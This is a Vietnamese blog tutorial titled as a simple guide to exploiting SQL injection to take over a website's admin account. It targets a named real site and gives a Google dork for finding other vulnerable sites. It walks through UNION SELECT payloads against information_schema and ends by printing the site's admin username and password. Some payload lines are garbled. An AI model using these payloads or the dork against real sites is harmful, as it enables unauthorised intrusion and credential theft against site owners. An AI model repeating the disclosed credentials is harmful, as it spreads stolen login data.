7/22/16
0 Comment
1.Hackbar (Vào https://addons.mozilla.org/vi/firefox -> search " Hackbar " )Bây Giờ Tiến Hành Với Victim Nhé ! Victim : http://khariwalkaz.com ( Hoặc Có Thế Lên Google Gõ "inurl:index.php?id=" Để Dork tìm Site Bị Lỗi SQL )Đi 1 Vòng Site Tìm Link Có Dạng ?id=Chẳng hạn như link này :http://khariwalkaz.com/index.php?id=1B2: Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ' Vào Và Ta Đc Link Như Thế Này :http://khariwalkaz.com/index.php?id=1' LỗiB3: Tiếp đến ta dùng lệnh order by để tìm xem bao nhiêu cột Columshttp://khariwalkaz.com/index.php?id=1 order by 1-- - http://khariwalkaz.com/index.php?id=1 order by 2-- - ...http://khariwalkaz.com/index.php?id=1 order by 13-- - Không lỗihttp://khariwalkaz.com/index.php?id=1 order by 14-- - LỗiB4: Bây h Dùng Lệnh UNION SELECT để khai thác nóVậy ta sẽ dùng lệnh UNION SELECT với số cột là 13http://khariwalkaz.com/index.php?id=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- -Nó sẽ hiện lên số bị lỗiVí Dụ: Cột số 2B5: Và bây h ta dùng lệnh sau để khai tháchttp://khariwalkaz.com/index.php?id=1 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()-- -Chú Ý: ( Thay group_concat(table_name) vào số cột bị lỗi mà ta đã tìm như trước ( cột 2 ) và thêm from information_schema.tables where table_schema=database() Sau Khai Thác Xong Ta Được: "orderdetail,orders,procate,product,tt_admin,tt_careers,tt_links...."B6: Tiếp Theo Tìm Các Column Trong Table tt_admin . Cần Phãi Encode tên table sang mã Hex Và thêm trước nó "0x" Để Hệ Thống Biết Đó Là Mã Hex . Mã Hex của tt_admin là 74745f61646d696e Thêm "0x" ỡ đầu sẽ thành : http://khariwalkaz.com/index.php?id=1 UNION SELECT 1,group_concat(=0x74745f61646d696e()-- -_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.Bây h Nó sẽ Xuất Hiện 1 dãy table : " id,username,password,email"B8: H chúng ta lại đổi lại linkhttp://khariwalkaz.com/index.php?id=1 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=0x74745f61646d696e()-- -Thànhhttp://khariwalkaz.com/index.php?id=1 UNION SELECT 1,group_concat(),3,4,5,6,7,8,9,10,11,12,13from tt_adminLúc này ta đã có 1 ID của ADMIN là:username: khariwalkazpassword: !@#khari!@#$
Subscribe Our Newsletter

0 Response to "Hướng dẫn khai thác lỗi SQL đơn giản - Lấy quyền điều khiển admin web"
Post a Comment